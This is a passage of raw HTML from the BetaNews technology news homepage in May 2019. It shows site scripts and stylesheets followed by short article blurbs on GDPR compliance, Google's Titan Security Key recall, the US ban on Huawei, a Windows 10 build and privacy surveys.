g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='aalb_basics_css-css' href='https://betanews.com/wp-content/plugins/amazon-associates-link-builder/css/aalb_basics.css?ver=1.7.0' type='text/css' media='all' /> <link rel='stylesheet' id='wp-polls-css' href='https://betanews.com/wp-content/plugins/wp-polls/polls-css.css?ver=2.73.8' type='text/css' media='all' /> <style id='wp-polls-inline-css' type='text/css'> .wp-polls .pollbar { margin: 1px; font-size: 12px; line-height: 14px; height: 14px; background: #0162ac; border: 1px solid #b7b9ba; } </style> <link rel='stylesheet' id='jetpack-widget-social-icons-styles-css' href='https://betanews.com/wp-content/plugins/jetpack/modules/widgets/social-icons/social-icons.css?ver=20170506' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://betanews.com/wp-content/plugins/jetpack/css/jetpack.css?ver=6.1.1' type='text/css' media='all' /> <script type='text/javascript' src='https://betanews.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://betanews.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <link rel='https://api.w.org/' href='https://betanews.com/wp-json/' /> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <style type='text/css'>img#wpstats{display:none}</style> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="BetaNews" /> <meta property="og:description" content="Technology News and Analysis" /> <meta property="og:url" content="https://betanews.com/" /> <meta property="og:site_name" content="BetaNews" /> <meta property="og:image" content="https://betanews.com/wp-content/uploads/2017/01/cropped-BN-Social.png" /> <meta property="og:image:width" content="512" /> <meta property="og:image:height" content="512" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:site" content="@BetaNews" /> <!-- End Jetpack Open Graph Tags --> <link rel="icon" href="https://betanews.com/wp-content/uploads/2017/01/cropped-BN-Social-32x32.png" sizes="32x32" /> <link rel="icon" href="https://betanews.com/wp-content/uploads/2017/01/cropped-BN-Social-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://betanews.com/wp-content/uploads/2017/01/cropped-BN-Social-180x180.png" /> <meta name="msapplication-TileImage" content="https://betanews.com/wp-content/uploads/2017/01/cropped-BN-Social-270x270.png" /> <script type="text/javascript">window.$ = jQuery;</script> <script type="text/javascript" id="nsgpt" src="//cdn.nsstatic.net/ns/betanews.com.js" async="true"></script> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> </head> <body class="home blog"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.4&appId=230284516983405"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div id="page"> <div id="hd"> <div id="navBar"> <ul class="mainNav"> <li class="first active"><a href="/">Tech News</a></li> <li class="fileforum"><a href="https://fileforum.betanews.com/">Downloads</a></li> <li><a href="http://store.fileforum.com/">Software Store</a></li> </ul> <div class="searchBox"> <form action="/" id="searchform" method="get"> <div> <label for="s" class="screen-reader-text hidden">Search for:</label> <input type="text" id="s" name="s" placeholder="Search BetaNews" class="searchInput" /> <input type="submit" value="Search" id="searchsubmit" class="button search" /> </div> </form> </div> </div> <div class="topHome"> <a href="/" id="mainLogo">BetaNews</a> </div> <div id="topicsBar" class="clearfix"> <ul class="mainNav"> <li class="listTitle">Hot Topics:</li> <li class="first"><a href="/topic/windows-10/">Windows 10</a></li><li class=""><a href="/topic/microsoft/">Microsoft</a></li><li class=""><a href="/topic/apple/">Apple</a></li><li class=""><a href="/topic/cloud/">Cloud</a></li><li class=""><a href="/topic/linux/">Linux</a></li><li class=""><a href="/topic/android/">Android</a></li><li class=""><a href="/topic/security/">Security</a></li><li class=""><a href="/topic/review/">Reviews</a></li> </ul> <ul class="socialMedia"> <li class="listTitle">Follow Us:</li> <li><a href="https://twitter.com/BetaNews" class="twitter" title="Twitter">Twitter</a></li> <li><a href="https://www.facebook.com/pages/BetaNews/167777169963870" class="facebook" title="Facebook">Facebook</a></li> <li><a href="https://www.linkedin.com/company/1034321" class="linkedin" title="Linked-in" target="_blank">Linked-in</a></li> <li><a href="https://betanews.com/feed" class="rss" title="RSS">RSS</a></li> </ul> </div> </div><!-- #hd --> <div id="bd" class="clearfix"> <div class="bigLeader"> <div data-ns="billboard"></div> </div> <div class="wideCol"> <div class="section highlightedArticles"> <div class="content clearfix"> <!-- main-feature --> <div class="biggerCol"> <div class="first"> <a href="https://betanews.com/2019/05/15/check-if-vulnerable-to-microarchitectural-data-sampling-mds-attacks/"><img width="350" height="200" src="https://betanews.com/wp-content/uploads/2019/05/Shocked-350x200.jpg" class="wp-image-417393 thumb wp-post-image" alt="" /></a> <h2><a href="https://betanews.com/2019/05/15/check-if-vulnerable-to-microarchitectural-data-sampling-mds-attacks/">How to check if your Windows or Linux system is vulnerable to Microarchitectural Data Sampling (MDS) attacks</a></h2> </div> </div> <!-- small-3-feature --> <div class="smallerCol"> <div class="second"> <a href="https://betanews.com/2019/05/15/facebook-privacy-issue-expected/"><img width="350" height="200" src="https://betanews.com/wp-content/uploads/2019/01/facebook-key-350x200.jpg" class="wp-image-410996 thumb wp-post-image" alt="Facebook key" /></a> <h2><a href="https://betanews.com/2019/05/15/facebook-privacy-issue-expected/">Four out of five people expect Facebook to have another data privacy issue this year</a></h2> </div> <div class="third clearfix"> <a href="https://betanews.com/2019/05/15/perception-vs-reality-in-web-security/"><img width="50" height="50" src="https://betanews.com/wp-content/uploads/2017/06/Website-address-bar-50x50.jpg" class="wp-image-375249 thumb wp-post-image" alt="web address bar" srcset="https://betanews.com/wp-content/uploads/2017/06/Website-address-bar-50x50.jpg 50w, https://betanews.com/wp-content/uploads/2017/06/Website-address-bar-150x150.jpg 150w, https://betanews.com/wp-content/uploads/2017/06/Website-address-bar-144x144.jpg 144w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h2><a href="https://betanews.com/2019/05/15/perception-vs-reality-in-web-security/">Perception vs reality in web security</a></h2> </div> </div> </div> </div> <div class="section editorial"> <div class="header"> <h2>Spotlight</h2> </div> <div class="content clearfix"> <div class="halfCol"> <img src="https://betanews.com/wp-content/themes/betanews/images/authors/mbamburic_bigthumb.png" width="99" height="93" alt="Mihăiță Bamburic" style="float:right;" /> <h2><a href="https://betanews.com/2019/04/02/best-new-features-visual-studio-2019/">The best new features in Visual Studio 2019 (and Visual Studio 2019 for Mac)</a></h2> <div class="author">by Mihăiță Bamburic</div> </div> <div class="lastCol"> <div data-ns="native" data-sharethrough="4fd68d75"></div> </div> </div> </div> <div class="sectionTop latestNews"> <h1>Latest Technology News</h1> </div> <div class="section articles"> <div class="content"> <div class="articleBlurb" id="post-417447"> <h2 class="entry-title"><a href="https://betanews.com/2019/05/16/application-development-challenges/" title="Permalink to Application development industry faces major challenges" rel="bookmark">Application development industry faces major challenges</a></h2> <div class="subheader clearfix"> <img src="/wp-content/themes/betanews/images/authors/ianbarker_smallthumb.png" class="authorThumb" alt="" height="40" width="45" /> <div class="metadata"> <div class="author">By <a rel="nofollow author" href="https://betanews.com/author/ianbarker/">Ian Barker</a></div> <div class="postDate">2 hours ago</div> </div> <div class="actions"> <ul> <li class="socialshare"><script type="IN/Share" data-url="https://betanews.com/2019/05/16/application-development-challenges/" data-counter="right"></script></li> <li class="socialshare"><fb:like href="https://betanews.com/2019/05/16/application-development-challenges/" send="false" layout="button_count" show_faces="false" width="90"></fb:like></li> <li class="socialshare"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://betanews.com/2019/05/16/application-development-challenges/" data-counturl="https://betanews.com/2019/05/16/application-development-challenges/" data-via="BetaNews" data-text="Application development industry faces major challenges" data-count="horizontal">Tweet</a></li> <li class="comments"><a href="https://betanews.com/2019/05/16/application-development-challenges/#respond" class="comments">No Comments</a></li> </ul> </div> </div> <div class="body clearfix"> <a href="https://betanews.com/2019/05/16/application-development-challenges/" title="Permalink to Application development industry faces major challenges" rel="bookmark"><img width="150" height="150" src="https://betanews.com/wp-content/uploads/2014/04/Cloud-developer-tablet-150x150.jpg" class="wp-image-233552 thumb wp-post-image" alt="developer" srcset="https://betanews.com/wp-content/uploads/2014/04/Cloud-developer-tablet-150x150.jpg 150w, https://betanews.com/wp-content/uploads/2014/04/Cloud-developer-tablet-50x50.jpg 50w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>Demand for application development is soaring, but the industry faces some major challenges according to a new report.</p> <p>The study from <a href="https://www.outsystems.com/" target="_blank" rel="nofollow noopener">OutSystems</a> shows the number of applications slated for delivery in 2019 has increased by 60 percent, and 38 percent of respondents plan to deliver 25 or more apps this year.</p> <p class="readmore"> <a href="https://betanews.com/2019/05/16/application-development-challenges/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </div> </div> <div class="articleBlurb" id="post-417445"> <h2 class="entry-title"><a href="https://betanews.com/2019/05/16/missed-gdpr-compliance/" title="Permalink to Half of companies missed GDPR compliance deadline" rel="bookmark">Half of companies missed GDPR compliance deadline</a></h2> <div class="subheader clearfix"> <img src="/wp-content/themes/betanews/images/authors/ianbarker_smallthumb.png" class="authorThumb" alt="" height="40" width="45" /> <div class="metadata"> <div class="author">By <a rel="nofollow author" href="https://betanews.com/author/ianbarker/">Ian Barker</a></div> <div class="postDate">3 hours ago</div> </div> <div class="actions"> <ul> <li class="socialshare"><script type="IN/Share" data-url="https://betanews.com/2019/05/16/missed-gdpr-compliance/" data-counter="right"></script></li> <li class="socialshare"><fb:like href="https://betanews.com/2019/05/16/missed-gdpr-compliance/" send="false" layout="button_count" show_faces="false" width="90"></fb:like></li> <li class="socialshare"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://betanews.com/2019/05/16/missed-gdpr-compliance/" data-counturl="https://betanews.com/2019/05/16/missed-gdpr-compliance/" data-via="BetaNews" data-text="Half of companies missed GDPR compliance deadline" data-count="horizontal">Tweet</a></li> <li class="comments"><a href="https://betanews.com/2019/05/16/missed-gdpr-compliance/#respond" class="comments">No Comments</a></li> </ul> </div> </div> <div class="body clearfix"> <a href="https://betanews.com/2019/05/16/missed-gdpr-compliance/" title="Permalink to Half of companies missed GDPR compliance deadline" rel="bookmark"><img width="150" height="150" src="https://betanews.com/wp-content/uploads/2018/01/GDPR-touchscreen-150x150.jpg" class="wp-image-392184 thumb wp-post-image" alt="GDPR touchscreen" srcset="https://betanews.com/wp-content/uploads/2018/01/GDPR-touchscreen-150x150.jpg 150w, https://betanews.com/wp-content/uploads/2018/01/GDPR-touchscreen-50x50.jpg 50w, https://betanews.com/wp-content/uploads/2018/01/GDPR-touchscreen-144x144.jpg 144w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>Only half of companies achieved compliance with GDPR before the May 25, 2018 deadline, and most companies took seven months or longer to achieve readiness.</p> <p>This is among the findings of a new report from privacy management platform <a href="https://datagrail.io/" target="_blank" rel="nofollow noopener">DataGrail</a> which also reveals that two-thirds of companies assigned dozens, or even hundreds, of employees to manage GDPR compliance.</p> <p class="readmore"> <a href="https://betanews.com/2019/05/16/missed-gdpr-compliance/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </div> </div> <div class="articleBreak clearfix"> <div class="halfCol"> <div class="section discussion clearfix"><div class="sectionTop"><div class="icon bubble"></div><h2>Most Commented Stories</h2></div><div class="content"><div class="headline first"><h4><a href="https://betanews.com/2019/05/12/microsoft-office-data-collection/">Privacy: Microsoft wants to (sneakily) collect more data from users via Office</a></h4><div class="reviewCount">72 Comments</div></div><div class="headline"><h4><a href="https://betanews.com/2019/05/14/microsoft-bing-maps-autosuggest/">Privacy: Microsoft is tracking your search activity for Bing Maps</a></h4><div class="reviewCount">47 Comments</div></div><div class="headline"><h4><a href="https://betanews.com/2019/05/10/mozilla-firefox-add-ons-fix-telemetry-deletion/">Mozilla promises to delete private data collected by Firefox fix and apologizes for add-on outage</a></h4><div class="reviewCount">42 Comments</div></div><div class="headline"><h4><a href="https://betanews.com/2019/05/09/bolthub-ipad/">The 'invisible' USB-C BoltHub adds 3.5mm audio, 4K HDMI, microSD, SD, and USB-A to Apple iPad Pro</a></h4><div class="reviewCount">41 Comments</div></div><div class="headline"><h4><a href="https://betanews.com/2019/05/14/ditch-whatsapp-for-signal-or-telegram/">Why it might be time to ditch WhatsApp for Signal or Telegram</a></h4><div class="reviewCount">24 Comments</div></div></div></div> </div> <div class="halfCol"> <div class="section history last"><div class="sectionTop"><div class="icon calendar"></div><h2>Today in Tech History</h2></div><div class="content"><div class="event first"><h4><span class="year">2006</span><a href="https://betanews.com/2006/05/11/nsa-has-record-of-us-to-us-calls/">NSA Has Record of US-to-US Calls</a></h4></div><div class="event"><h4><span class="year">2005</span><a href="https://betanews.com/2005/05/13/ms-to-offer-windows-antivirus-more/">MS to Offer Windows Antivirus, More</a></h4></div><div class="event"><h4><span class="year">2004</span><a href="https://betanews.com/2004/05/11/microsoft-sp2-will-not-install-on-pirated-copies-of-xp/">Microsoft: SP2 Will Not Install on Pirated Copies of XP</a></h4></div><div class="event"><h4><span class="year">2003</span><a href="https://betanews.com/2003/05/12/msn-chats-up-messenger-6/">MSN Chats Up Messenger 6</a></h4></div><div class="event"><h4><span class="year">2001</span><a href="https://betanews.com/2001/05/12/leaked-login-spreads-xp-floods-ms-network/">Leaked Login Spreads XP, Floods MS Network</a></h4></div><div class="event"><h4><span class="year">2000</span><a href="https://betanews.com/2000/05/13/windows-2000-service-pack-1-beta/">Windows 2000 Service Pack 1 Beta</a></h4></div></div></div> </div> </div> <div class="articleBlurb" id="post-417443"> <h2 class="entry-title"><a href="https://betanews.com/2019/05/16/uk-business-protect-data/" title="Permalink to UK consumers want businesses to do more to protect their data" rel="bookmark">UK consumers want businesses to do more to protect their data</a></h2> <div class="subheader clearfix"> <img src="/wp-content/themes/betanews/images/authors/ianbarker_smallthumb.png" class="authorThumb" alt="" height="40" width="45" /> <div class="metadata"> <div class="author">By <a rel="nofollow author" href="https://betanews.com/author/ianbarker/">Ian Barker</a></div> <div class="postDate">5 hours ago</div> </div> <div class="actions"> <ul> <li class="socialshare"><script type="IN/Share" data-url="https://betanews.com/2019/05/16/uk-business-protect-data/" data-counter="right"></script></li> <li class="socialshare"><fb:like href="https://betanews.com/2019/05/16/uk-business-protect-data/" send="false" layout="button_count" show_faces="false" width="90"></fb:like></li> <li class="socialshare"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://betanews.com/2019/05/16/uk-business-protect-data/" data-counturl="https://betanews.com/2019/05/16/uk-business-protect-data/" data-via="BetaNews" data-text="UK consumers want businesses to do more to protect their data" data-count="horizontal">Tweet</a></li> <li class="comments"><a href="https://betanews.com/2019/05/16/uk-business-protect-data/#respond" class="comments">No Comments</a></li> </ul> </div> </div> <div class="body clearfix"> <a href="https://betanews.com/2019/05/16/uk-business-protect-data/" title="Permalink to UK consumers want businesses to do more to protect their data" rel="bookmark"><img width="150" height="150" src="https://betanews.com/wp-content/uploads/2017/06/Business-padlock-security-150x150.jpg" class="wp-image-376142 thumb wp-post-image" alt="business security" srcset="https://betanews.com/wp-content/uploads/2017/06/Business-padlock-security-150x150.jpg 150w, https://betanews.com/wp-content/uploads/2017/06/Business-padlock-security-50x50.jpg 50w, https://betanews.com/wp-content/uploads/2017/06/Business-padlock-security-144x144.jpg 144w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>Protecting your digital footprint is growing more important and the results from a survey of 2,000 UK adults by <a href="https://www.kaspersky.com/" target="_blank" rel="nofollow noopener">Kaspersky Lab</a> finds that people believe there is not enough business or state protection currently in place to defend it.</p> <p>The study finds 41 percent of UK respondents think that businesses should do more to protect their personal data, including passwords, addresses and bank account details, from hacking.</p> <p class="readmore"> <a href="https://betanews.com/2019/05/16/uk-business-protect-data/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </div> </div> <div class="articleBlurb" id="post-417439"> <h2 class="entry-title"><a href="https://betanews.com/2019/05/16/google-titan-security-key-recall/" title="Permalink to Google recalls Bluetooth version of Titan Security Key after discovering hacking vulnerability" rel="bookmark">Google recalls Bluetooth version of Titan Security Key after discovering hacking vulnerability</a></h2> <div class="subheader clearfix"> <img src="/wp-content/themes/betanews/images/authors/mwilson_smallthumb.png" class="authorThumb" alt="" height="40" width="45" /> <div class="metadata"> <div class="author">By <a rel="nofollow author" href="https://betanews.com/author/mwilson/">Mark Wyciślik-Wilson</a></div> <div class="postDate">7 hours ago</div> </div> <div class="actions"> <ul> <li class="socialshare"><script type="IN/Share" data-url="https://betanews.com/2019/05/16/google-titan-security-key-recall/" data-counter="right"></script></li> <li class="socialshare"><fb:like href="https://betanews.com/2019/05/16/google-titan-security-key-recall/" send="false" layout="button_count" show_faces="false" width="90"></fb:like></li> <li class="socialshare"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://betanews.com/2019/05/16/google-titan-security-key-recall/" data-counturl="https://betanews.com/2019/05/16/google-titan-security-key-recall/" data-via="BetaNews" data-text="Google recalls Bluetooth version of Titan Security Key after discovering hacking vulnerability" data-count="horizontal">Tweet</a></li> <li class="comments"><a href="https://betanews.com/2019/05/16/google-titan-security-key-recall/#comments" class="comments">1 Comment</a></li> </ul> </div> </div> <div class="body clearfix"> <a href="https://betanews.com/2019/05/16/google-titan-security-key-recall/" title="Permalink to Google recalls Bluetooth version of Titan Security Key after discovering hacking vulnerability" rel="bookmark"><img width="150" height="150" src="https://betanews.com/wp-content/uploads/2018/07/google-titan-security-keys-150x150.jpg" class="wp-image-403491 thumb wp-post-image" alt="Google Titan Security Key" srcset="https://betanews.com/wp-content/uploads/2018/07/google-titan-security-keys-150x150.jpg 150w, https://betanews.com/wp-content/uploads/2018/07/google-titan-security-keys-50x50.jpg 50w, https://betanews.com/wp-content/uploads/2018/07/google-titan-security-keys-144x144.jpg 144w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>Google is recalling the Bluetooth Low Energy (BLE) version of its Titan Security Key, and is offering free replacements to owners.</p> <p>The recall comes after the company became aware of a security issue which could allow a nearby hacker to hijack the security device. Google says that the security issue only affects the Bluetooth versions of the 2FA device sold in the US.</p> <p class="readmore"> <a href="https://betanews.com/2019/05/16/google-titan-security-key-recall/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </div> </div> <div class="articleBlurb" id="post-417435"> <h2 class="entry-title"><a href="https://betanews.com/2019/05/16/trump-national-emergency-huawei/" title="Permalink to Trump invokes National Emergencies Act effectively banning Huawei from US" rel="bookmark">Trump invokes National Emergencies Act effectively banning Huawei from US</a></h2> <div class="subheader clearfix"> <img src="/wp-content/themes/betanews/images/authors/mwilson_smallthumb.png" class="authorThumb" alt="" height="40" width="45" /> <div class="metadata"> <div class="author">By <a rel="nofollow author" href="https://betanews.com/author/mwilson/">Mark Wyciślik-Wilson</a></div> <div class="postDate">7 hours ago</div> </div> <div class="actions"> <ul> <li class="socialshare"><script type="IN/Share" data-url="https://betanews.com/2019/05/16/trump-national-emergency-huawei/" data-counter="right"></script></li> <li class="socialshare"><fb:like href="https://betanews.com/2019/05/16/trump-national-emergency-huawei/" send="false" layout="button_count" show_faces="false" width="90"></fb:like></li> <li class="socialshare"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://betanews.com/2019/05/16/trump-national-emergency-huawei/" data-counturl="https://betanews.com/2019/05/16/trump-national-emergency-huawei/" data-via="BetaNews" data-text="Trump invokes National Emergencies Act effectively banning Huawei from US" data-count="horizontal">Tweet</a></li> <li class="comments"><a href="https://betanews.com/2019/05/16/trump-national-emergency-huawei/#comments" class="comments">1 Comment</a></li> </ul> </div> </div> <div class="body clearfix"> <a href="https://betanews.com/2019/05/16/trump-national-emergency-huawei/" title="Permalink to Trump invokes National Emergencies Act effectively banning Huawei from US" rel="bookmark"><img width="150" height="150" src="https://betanews.com/wp-content/uploads/2019/04/huawei-store-1-150x150.jpg" class="wp-image-416036 thumb wp-post-image" alt="Huawei store sign" srcset="https://betanews.com/wp-content/uploads/2019/04/huawei-store-1-150x150.jpg 150w, https://betanews.com/wp-content/uploads/2019/04/huawei-store-1-50x50.jpg 50w, https://betanews.com/wp-content/uploads/2019/04/huawei-store-1-144x144.jpg 144w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>Donald Trump has declared a national emergency to fight "foreign adversaries" which he says are "increasingly creating and exploiting vulnerabilities in information and communications technology".</p> <p>An executive order means that US companies are banned from buying and using foreign telecoms equipment which is deemed to be a threat to national security. Huawei and 70 affiliates have also been added to the US Commerce Department’s "Entity List" meaning that special approval would be needed to purchase such equipment, and also for companies deemed to pose a threat to buy US-made hardware.</p> <p class="readmore"> <a href="https://betanews.com/2019/05/16/trump-national-emergency-huawei/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </div> </div> <div class="articleBlurb" id="post-417411"> <h2 class="entry-title"><a href="https://betanews.com/2019/05/15/satechi-m1-bluetooth-mouse/" title="Permalink to Satechi launches Aluminum M1 Bluetooth Wireless Mouse with USB-C" rel="bookmark">Satechi launches Aluminum M1 Bluetooth Wireless Mouse with USB-C</a></h2> <div class="subheader clearfix"> <img src="/wp-content/themes/betanews/images/authors/bfagioli_smallthumb.png" class="authorThumb" alt="" height="40" width="45" /> <div class="metadata"> <div class="author">By <a rel="nofollow author" href="https://betanews.com/author/brianfagioli/">Brian Fagioli</a></div> <div class="postDate">22 hours ago</div> </div> <div class="actions"> <ul> <li class="socialshare"><script type="IN/Share" data-url="https://betanews.com/2019/05/15/satechi-m1-bluetooth-mouse/" data-counter="right"></script></li> <li class="socialshare"><fb:like href="https://betanews.com/2019/05/15/satechi-m1-bluetooth-mouse/" send="false" layout="button_count" show_faces="false" width="90"></fb:like></li> <li class="socialshare"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://betanews.com/2019/05/15/satechi-m1-bluetooth-mouse/" data-counturl="https://betanews.com/2019/05/15/satechi-m1-bluetooth-mouse/" data-via="BetaNews" data-text="Satechi launches Aluminum M1 Bluetooth Wireless Mouse with USB-C" data-count="horizontal">Tweet</a></li> <li class="comments"><a href="https://betanews.com/2019/05/15/satechi-m1-bluetooth-mouse/#comments" class="comments">1 Comment</a></li> </ul> </div> </div> <div class="body clearfix"> <a href="https://betanews.com/2019/05/15/satechi-m1-bluetooth-mouse/" title="Permalink to Satechi launches Aluminum M1 Bluetooth Wireless Mouse with USB-C" rel="bookmark"><img width="150" height="150" src="https://betanews.com/wp-content/uploads/2019/05/m1-mouse-150x150.jpg" class="wp-image-417416 thumb wp-post-image" alt="" srcset="https://betanews.com/wp-content/uploads/2019/05/m1-mouse-150x150.jpg 150w, https://betanews.com/wp-content/uploads/2019/05/m1-mouse-300x300.jpg 300w, https://betanews.com/wp-content/uploads/2019/05/m1-mouse-600x600.jpg 600w, https://betanews.com/wp-content/uploads/2019/05/m1-mouse-50x50.jpg 50w, https://betanews.com/wp-content/uploads/2019/05/m1-mouse-144x144.jpg 144w, https://betanews.com/wp-content/uploads/2019/05/m1-mouse.jpg 645w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>Satechi is a company that makes really great products that are also affordable. While many of its offerings are Apple-focused, they usually work fine with all things. For instance, it manufactures USB-C dongles that use colors to match MacBook laptops, but color aside, they are totally Windows compatible too.</p> <p>Today, Satechi launches a new elegantly designed Bluetooth 4.0 mouse that is clearly aimed at macOS users, but it will of course work with both Windows and Linux too. Called "M1," it features a premium aluminum body and scroll wheel. Sadly, there are no side thumb buttons -- likely a deal-breaker for some.</p> <p class="readmore"> <a href="https://betanews.com/2019/05/15/satechi-m1-bluetooth-mouse/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </div> </div> <div class="articleBlurb" id="post-417420"> <h2 class="entry-title"><a href="https://betanews.com/2019/05/15/windows-10-20h1-build-18898/" title="Permalink to Microsoft releases Windows 10 20H1 Build 18898 with Task Manager improvements" rel="bookmark">Microsoft releases Windows 10 20H1 Build 18898 with Task Manager improvements</a></h2> <div class="subheader clearfix"> <img src="/wp-content/themes/betanews/images/authors/wwilliams_smallthumb.png" class="authorThumb" alt="" height="40" width="45" /> <div class="metadata"> <div class="author">By <a rel="nofollow author" href="https://betanews.com/author/waynewill1/">Wayne Williams</a></div> <div class="postDate">22 hours ago</div> </div> <div class="actions"> <ul> <li class="socialshare"><script type="IN/Share" data-url="https://betanews.com/2019/05/15/windows-10-20h1-build-18898/" data-counter="right"></script></li> <li class="socialshare"><fb:like href="https://betanews.com/2019/05/15/windows-10-20h1-build-18898/" send="false" layout="button_count" show_faces="false" width="90"></fb:like></li> <li class="socialshare"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://betanews.com/2019/05/15/windows-10-20h1-build-18898/" data-counturl="https://betanews.com/2019/05/15/windows-10-20h1-build-18898/" data-via="BetaNews" data-text="Microsoft releases Windows 10 20H1 Build 18898 with Task Manager improvements" data-count="horizontal">Tweet</a></li> <li class="comments"><a href="https://betanews.com/2019/05/15/windows-10-20h1-build-18898/#comments" class="comments">5 Comments</a></li> </ul> </div> </div> <div class="body clearfix"> <a href="https://betanews.com/2019/05/15/windows-10-20h1-build-18898/" title="Permalink to Microsoft releases Windows 10 20H1 Build 18898 with Task Manager improvements" rel="bookmark"><img width="150" height="150" src="https://betanews.com/wp-content/uploads/2016/02/Windows-10-key-150x150.jpg" class="wp-image-323571 thumb wp-post-image" alt="" srcset="https://betanews.com/wp-content/uploads/2016/02/Windows-10-key-150x150.jpg 150w, https://betanews.com/wp-content/uploads/2016/02/Windows-10-key-50x50.jpg 50w, https://betanews.com/wp-content/uploads/2016/02/Windows-10-key-144x144.jpg 144w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>The May 2019 Update is still undergoing <a href="https://betanews.com/2019/05/01/windows-10-upgrade-blocks/">testing in the Release Preview ring</a>, but <a href="https://betanews.com/topic/microsoft/">Microsoft</a> is busy working on builds from the 20H1 branch, the feature update set to be released in the first half of next year.</p> <p>We’re starting to see new features arriving on that branch, and today’s flight, Build 18898, adds a useful addition to the Task Manager.</p> <p class="readmore"> <a href="https://betanews.com/2019/05/15/windows-10-20h1-build-18898/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </div> </div> <div class="articleBlurb" id="post-417406"> <h2 class="entry-title"><a href="https://betanews.com/2019/05/15/facebook-privacy-issue-expected/" title="Permalink to Four out of five people expect Facebook to have another data privacy issue this year" rel="bookmark">Four out of five people expect Facebook to have another data privacy issue this year</a></h2> <div class="subheader clearfix"> <img src="/wp-content/themes/betanews/images/authors/ianbarker_smallthumb.png" class="authorThumb" alt="" height="40" width="45" /> <div class="metadata"> <div class="author">By <a rel="nofollow author" href="https://betanews.com/author/ianbarker/">Ian Barker</a></div> <div class="postDate">1 day ago</div> </div> <div class="actions"> <ul> <li class="socialshare"><script type="IN/Share" data-url="https://betanews.com/2019/05/15/facebook-privacy-issue-expected/" data-counter="right"></script></li> <li class="socialshare"><fb:like href="https://betanews.com/2019/05/15/facebook-privacy-issue-expected/" send="false" layout="button_count" show_faces="false" width="90"></fb:like></li> <li class="socialshare"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://betanews.com/2019/05/15/facebook-privacy-issue-expected/" data-counturl="https://betanews.com/2019/05/15/facebook-privacy-issue-expected/" data-via="BetaNews" data-text="Four out of five people expect Facebook to have another data privacy issue this year" data-count="horizontal">Tweet</a></li> <li class="comments"><a href="https://betanews.com/2019/05/15/facebook-privacy-issue-expected/#comments" class="comments">6 Comments</a></li> </ul> </div> </div> <div class="body clearfix"> <a href="https://betanews.com/2019/05/15/facebook-privacy-issue-expected/" title="Permalink to Four out of five people expect Facebook to have another data privacy issue this year" rel="bookmark"><img width="150" height="150" src="https://betanews.com/wp-content/uploads/2019/01/facebook-key-150x150.jpg" class="wp-image-410996 thumb wp-post-image" alt="Facebook key" srcset="https://betanews.com/wp-content/uploads/2019/01/facebook-key-150x150.jpg 150w, https://betanews.com/wp-content/uploads/2019/01/facebook-key-50x50.jpg 50w, https://betanews.com/wp-content/uploads/2019/01/facebook-key-144x144.jpg 144w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>People are becoming more aware of the need to protect their data online, not just because of the rate of cybercriminal activity, but also because large organizations are frequently being careless with the data they hold.</p> <p>A new survey of 1,000 people from <a href="https://openvpn.net/" target="_blank" rel="nofollow noopener">OpenVPN</a> reveals that four out of five people are expecting Facebook to face at least one more data privacy issue in the next year. In addition 71 percent say recent scandals have somewhat or severely negatively affected their view on Facebook, while 37 percent trust tech giants less now because they don’t think the companies have properly addressed the data privacy problems.</p> <p class="readmore"> <a 